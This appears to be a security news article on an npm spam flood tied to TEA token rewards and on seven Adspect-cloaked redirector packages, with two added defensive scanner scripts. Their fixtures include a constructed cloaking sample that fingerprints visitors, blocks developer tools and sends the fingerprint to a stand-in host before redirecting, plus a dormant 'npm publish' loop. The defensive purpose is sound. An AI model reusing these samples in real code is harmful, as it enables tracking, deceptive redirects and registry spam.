npm faces dual threats: massive spam surge and cloaked redirects

Last updated: 11/20/2025
  • Large-scale npm flooding tied to TEA token rewards reached 150k+ packages, evolving from earlier waves of tens of thousands.
  • Spam bundles used dormant scripts, patterned naming, and dependency webs to evade typical scanners.
  • Coordinated response by Amazon Inspector and OpenSSF assigned MAL-IDs and mapped the campaign.
  • Separate incident: seven Adspect-cloaked packages redirected victims to crypto-themed sites.


Amid growing scrutiny of open-source supply chains, the npm registry has been rattled by two distinct threats: a sprawling, incentive-driven package deluge tied to TEA token rewards and a smaller set of cloaked redirector packages that selectively target victims. Both campaigns lean on automation and subtlety, showing how quickly opportunists can exploit the world’s most widely used JavaScript ecosystem.

While the flooding effort swelled to more than 150,000 flagged packages across multiple accounts, the cloaked redirectors relied on anti-research tactics to hide in plain sight. Together, they highlight persistent gaps in registry governance, dependency hygiene, and detection strategies that focus too narrowly on traditional install-time malware behaviors.

Inside the IndonesianFoods package deluge


The campaign informally dubbed “IndonesianFoods” used a patterned naming scheme—pairing common Indonesian first names with food terms plus numeric variants—to mint thousands of plausible-looking packages. Earlier measurements identified about 43,000 entries tied to the effort; later reports cited more than 100,000, and subsequent sweeps uncovered over 150,000 across the registry.

Although many bundles appeared legitimate—some even shipped functional Next.js templates—they tucked away dormant code (e.g., auto.js or publishScript.js). When manually launched, that script randomized versions, generated new names, and published fresh packages on a loop, with bursts observed as fast as every few seconds and claims that a single run could push 17,000+ packages per day.

This mass production was rarely isolated; individual entries often declared eight to ten dependencies that pointed to other spam packages, creating a self-referential lattice. The net effect was a worm-like spread without relying on typical postinstall hooks or overtly malicious behaviors, which kept many scanners quiet.

Financial incentives appear to have fueled the effort. Researchers found tea.yaml files in attacker-controlled packages referencing specific accounts and crypto wallets, apparently aiming to juice TEA impact scores and claim token rewards. Analyses indicate a staged evolution: a large spam base in 2023, TEA monetization signals in 2024, and the highly automated replication workflow in 2025.

It’s worth noting that some research later clarified the replication is not fully autonomous; the payload needs to be triggered. Even so, once kicked off, the publishing loop and pattern-driven naming massively amplified volume and registry noise.

Detection, response, and the scale of registry pollution


Amazon Inspector researchers rolled out new rules paired with AI in late October and quickly flagged suspicious tea.xyz-linked activity. Within days, the team had identified thousands of entries; by mid-November, coordinated work with the Open Source Security Foundation led to MAL-IDs being assigned at pace—often within about 30 minutes—ultimately mapping 150k+ packages tied to the campaign.

Other security teams observed knock-on effects at scale. Data systems were strained by the volume of advisories being generated, and platforms that rely on vulnerability feeds reported waves of new entries related to the spam. Researchers characterized the event as unprecedented in size, warning that the high degree of automation and cross-account coordination makes response and cleanup more complex than typical one-off compromises.

Even without credential theft or backdoors, the risks are tangible: persistent registry pollution that drowns out legitimate packages, wasteful consumption of infrastructure and bandwidth, and a dangerous precedent that rewards volume over value. The tactic also creates space for threat actors to later slip in harmful updates amid the noise.

Why scanners missed it—and what’s changing

Most security tooling emphasizes install-time red flags such as postinstall scripts, network beacons, or suspicious file operations. Here, dormant files weren’t referenced by any code paths, so scanners frequently treated them as inert. A lack of rate limiting, weak metadata scrutiny, and limited pattern detection for bulk-published artifacts allowed two things to happen: high-throughput uploads went unchecked, and coordinated clusters stayed below the radar.

Researchers say the episode marks a shift toward ecosystem-level manipulation driven by monetary incentives. Instead of compromising a single popular package, attackers are incentivized to inflate influence across many small entries, obscuring signals and eroding trust. This is prompting calls for tougher registry policies, richer behavioral analytics, and better community coordination.

  • Lock down publishing: restrict npm publish to CI/CD and authorized maintainers; require stronger identity checks for large-scale activity.
  • Improve SCA coverage: flag dormant files, repeated patterns, and circular dependency webs; prefer tools that surface non-install-time risks.
  • Constrain blast radius: pin versions, maintain SBOMs, and isolate CI/CD; add rate limits and CAPTCHA for mass submissions at the registry layer.
  • Continuously audit: remove low-quality and non-functional packages; monitor for anomalous naming, version churn, and account clustering.
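As an added example (not code from the article, and not the tooling of the research teams it cites), the following Node.js script applies the three heuristics that the campaign description and the bullets above call for: a name template shared by many packages from one account, JavaScript files that no entry point or npm script references yet invoke npm publish, and dependency edges that point back into the flagged cluster or form a cycle. The registry snapshot, account names, package names and file bodies are constructed for illustration; the threshold of three packages per template is an assumed value.

```javascript
// Added example: heuristics for bulk-published spam packages. Every package,
// account and file body below is constructed; nothing is fetched from npm.

const SPAM_TEMPLATE_MIN = 3; // assumed: a template recurring 3+ times under one account is suspect

function pkg(name, publisher, dependencies, extraFiles = {}) {
  return {
    name,
    publisher,
    main: "index.js",
    scripts: { test: "node test.js" },
    dependencies,
    files: { "index.js": "module.exports = {};", "test.js": "", ...extraFiles },
  };
}

// Constructed snapshot: one account minting a numbered template whose entries
// depend on each other and ship an unreferenced publish loop, plus one
// ordinary package from an unrelated account.
const snapshot = [
  pkg("andi-soto-1", "acct-a", ["andi-soto-2", "andi-soto-3"], {
    "auto.js": "const { execSync } = require('child_process'); setInterval(() => execSync('npm publish'), 5000);",
  }),
  pkg("andi-soto-2", "acct-a", ["andi-soto-3", "andi-soto-1"], {
    "publishScript.js": "require('child_process').execSync('npm publish');",
  }),
  pkg("andi-soto-3", "acct-a", ["andi-soto-1"]),
  pkg("tiny-util", "acct-b", ["lodash"]),
];

// Collapse digit runs so that andi-soto-1 and andi-soto-42 share one template.
function nameTemplate(name) {
  return name.replace(/\d+/g, "#");
}

// Names whose (publisher, template) pair recurs at least `min` times.
function templatedNames(pkgs, min = SPAM_TEMPLATE_MIN) {
  const groups = new Map();
  for (const p of pkgs) {
    const key = `${p.publisher}|${nameTemplate(p.name)}`;
    groups.set(key, (groups.get(key) || []).concat(p.name));
  }
  const flagged = new Set();
  for (const names of groups.values()) {
    if (names.length >= min) names.forEach((n) => flagged.add(n));
  }
  return flagged;
}

// JavaScript files that neither `main`, `bin` nor any npm script mentions,
// but whose body runs `npm publish`: dormant until someone launches them.
function dormantPublishScripts(p) {
  const referenced = [p.main, ...Object.values(p.scripts || {}), ...Object.values(p.bin || {})].join("\n");
  return Object.entries(p.files)
    .filter(([file, body]) => file.endsWith(".js") && !referenced.includes(file) && /npm\s+publish/.test(body))
    .map(([file]) => file);
}

// Packages whose dependency edges mostly point into the candidate set, plus
// every package on a dependency cycle inside that set.
function dependencyWebs(pkgs, candidates) {
  const byName = new Map(pkgs.map((p) => [p.name, p]));
  const inWeb = new Set();
  for (const p of pkgs) {
    const inside = p.dependencies.filter((d) => candidates.has(d)).length;
    if (p.dependencies.length && inside / p.dependencies.length >= 0.5) inWeb.add(p.name);
  }
  const state = new Map(); // 1 = on the DFS stack, 2 = finished
  const visit = (name, stack) => {
    if (!candidates.has(name) || !byName.has(name)) return;
    if (state.get(name) === 1) { // back edge: everything from `name` onward is on the cycle
      stack.slice(stack.indexOf(name)).forEach((n) => inWeb.add(n));
      return;
    }
    if (state.get(name) === 2) return;
    state.set(name, 1);
    for (const d of byName.get(name).dependencies) visit(d, stack.concat(name));
    state.set(name, 2);
  };
  for (const name of candidates) visit(name, []);
  return inWeb;
}

// Map of package name -> list of flags raised by the three heuristics.
function scoreSnapshot(pkgs) {
  const templated = templatedNames(pkgs);
  const webs = dependencyWebs(pkgs, templated);
  const report = new Map();
  for (const p of pkgs) {
    const flags = [];
    if (templated.has(p.name)) flags.push("templated-name");
    const dormant = dormantPublishScripts(p);
    if (dormant.length) flags.push(`dormant-publish-script:${dormant.join(",")}`);
    if (webs.has(p.name)) flags.push("dependency-web");
    report.set(p.name, flags);
  }
  return report;
}

for (const [name, flags] of scoreSnapshot(snapshot)) console.log(name, flags);
```

In practice the snapshot would be built from registry metadata (package.json fields, the publishing account and the tarball file list) rather than an inline array, and the template threshold should be tuned against a baseline of legitimately numbered packages so that ordinary versioned forks are not flagged. The dormant-file check is deliberately narrow: it only looks at files the manifest never references, which is exactly the blind spot the article describes for install-time scanners.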

Adspect-cloaked redirector packages surface

A separate npm incident involved seven packages published by a user known as dino_reborn between September and November 2025. Six entries carried a compact, roughly 39kB payload that fingerprinted visitors and used a traffic-cloaking service called Adspect to filter out researchers, while “signals-embed” acted as a decoy.

  • signals-embed (342 downloads)
  • dsidospsodlks (184 downloads)
  • applicationooks21 (340 downloads)
  • application-phskck (199 downloads)
  • integrator-filescrypt2025 (199 downloads)
  • integrator-2829 (276 downloads)
  • integrator-2830 (290 downloads)

The malicious code executed immediately when loaded in a browser environment via an Immediately Invoked Function Expression (IIFE). It harvested a system fingerprint, attempted to block developer tools to frustrate analysis, and consulted a proxy endpoint to decide whether to show a fake CAPTCHA that ultimately redirected victims to crypto-themed destinations impersonating services like StandX. If the visitor appeared to be a researcher, a plain white page—complete with references to a fake entity dubbed Offlido—was displayed instead.

Adspect markets itself as a cloud-based anti-fraud platform with “bulletproof cloaking,” offered via tiered subscription plans. Its presence inside supply-chain packages is unusual, and researchers argue that bundling Adspect logic with npm modules created a self-contained traffic-gating toolkit: distribution through a developer channel, execution in the browser, and selective exposure of the real payload only to likely victims.
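As an added example (not the payload from the packages above, and not code from the researchers who analyzed them), the following scanner checks a package's JavaScript source for the traits listed in the description: an IIFE that runs on load, browser fingerprinting, developer-tools interference, a remote decision endpoint, a CAPTCHA lure and a redirect. Both input samples are constructed strings that are only pattern-matched, never executed; the gate.example endpoint and everything else in them is invented for illustration.

```javascript
// Added example: static indicators of browser-side traffic cloaking. The two
// samples are constructed strings used as scanner input; they are not run.

const INDICATORS = {
  "iife": /\(\s*(?:async\s+)?(?:function\b|\(\s*\)\s*=>)/,               // code that executes as soon as it is loaded
  "fingerprint": /\b(?:navigator\.(?:userAgent|hardwareConcurrency|languages?|platform|plugins|webdriver)|screen\.(?:width|height|colorDepth))\b/,
  "devtools-block": /(?:keyCode\s*===?\s*123|["']F12["']|\bdebugger\b|["']contextmenu["'])/, // F12 / debugger / right-click interference
  "remote-gate": /\b(?:fetch\s*\(|XMLHttpRequest\b|navigator\.sendBeacon\s*\()/,           // asks a server whether to show the payload
  "redirect": /\blocation\.(?:href\s*=[^=]|replace\s*\(|assign\s*\()/,
  "captcha-lure": /captcha/i,
};

// Constructed sample with the traits described above (endpoint is fictional).
const suspiciousSample = `
(function () {
  var fp = [navigator.userAgent, navigator.hardwareConcurrency, screen.width].join("|");
  document.addEventListener("keydown", function (e) { if (e.keyCode === 123) e.preventDefault(); });
  setInterval(function () { debugger; }, 100);
  fetch("https://gate.example/check?fp=" + encodeURIComponent(fp))
    .then(function (r) { return r.json(); })
    .then(function (d) {
      if (d.show) { document.body.innerHTML = "<div>Verify you are human (captcha)</div>"; location.href = d.url; }
    });
})();
`;

// Constructed benign sample: an IIFE that fetches data and renders it.
const benignSample = `
(function () {
  fetch("/api/items").then(function (r) { return r.json(); }).then(render);
  function render(items) { document.getElementById("list").textContent = items.join(", "); }
})();
`;

// Names of every indicator whose pattern matches the source.
function cloakingIndicators(source) {
  return Object.entries(INDICATORS).filter(([, re]) => re.test(source)).map(([name]) => name);
}

// Fingerprinting plus anti-analysis plus a redirect is the cloaking signature;
// an IIFE with a fetch alone is how most ordinary browser bundles look.
function riskLevel(indicators) {
  const has = (n) => indicators.includes(n);
  if (has("devtools-block") && has("fingerprint") && has("redirect")) return "high";
  if (indicators.length >= 3) return "medium";
  return "low";
}

// Scan a map of file name -> source and report indicators and level per file.
function scanSources(samples) {
  return Object.fromEntries(
    Object.entries(samples).map(([name, src]) => {
      const indicators = cloakingIndicators(src);
      return [name, { indicators, level: riskLevel(indicators) }];
    }),
  );
}

console.log(scanSources({ "suspicious.js": suspiciousSample, "benign.js": benignSample }));
```

A regex pass like this is a triage filter, not a verdict: bundled or minified code can hide the same behaviour behind string building, so anything rated medium or high is worth loading in an instrumented browser and watching which endpoint it consults and what it does with the answer.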

Practical steps for teams and registries

For development teams, the safest immediate moves are to tighten publishing controls, prefer detectors that catch dormant artifacts, and cull questionable packages from dependency trees. For registry stewards, adding submission throttles, improving metadata analysis, and baking in anomaly detection for naming patterns and cross-account clustering should raise the bar for would-be spammers.

Amid shifting incentives and increasingly industrialized tactics, npm’s defenders face a different kind of challenge: when attackers can earn by flooding rather than infecting, the line between nuisance and risk narrows—and vigilance, collaboration, and smarter controls become the only sustainable response.
